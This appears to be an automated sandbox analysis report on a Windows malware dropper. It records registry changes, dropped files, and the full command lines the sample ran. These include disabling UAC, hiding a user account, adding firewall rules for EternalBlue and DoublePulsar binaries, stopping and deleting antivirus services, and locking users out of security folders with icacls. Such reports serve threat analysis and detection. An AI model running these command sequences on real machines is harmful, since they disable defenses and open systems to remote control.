| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Windows\winit.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\MIME\Database | C:\ProgramData\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\ProgramData\Windows\winit.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\winit.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\P.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\R8.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\winlogon.exe | N/A |
| N/A | N/A | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| N/A | N/A | C:\Programdata\WindowsTask\winlogon.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe
"C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe"
C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\programdata\install\ink.exe
C:\programdata\install\ink.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\SysWOW64\sc.exe
sc delete swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop AudioServer
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
C:\Windows\SysWOW64\sc.exe
sc stop AudioServer
C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AudioServer"
C:\Windows\SysWOW64\sc.exe
sc delete AudioServer"
C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
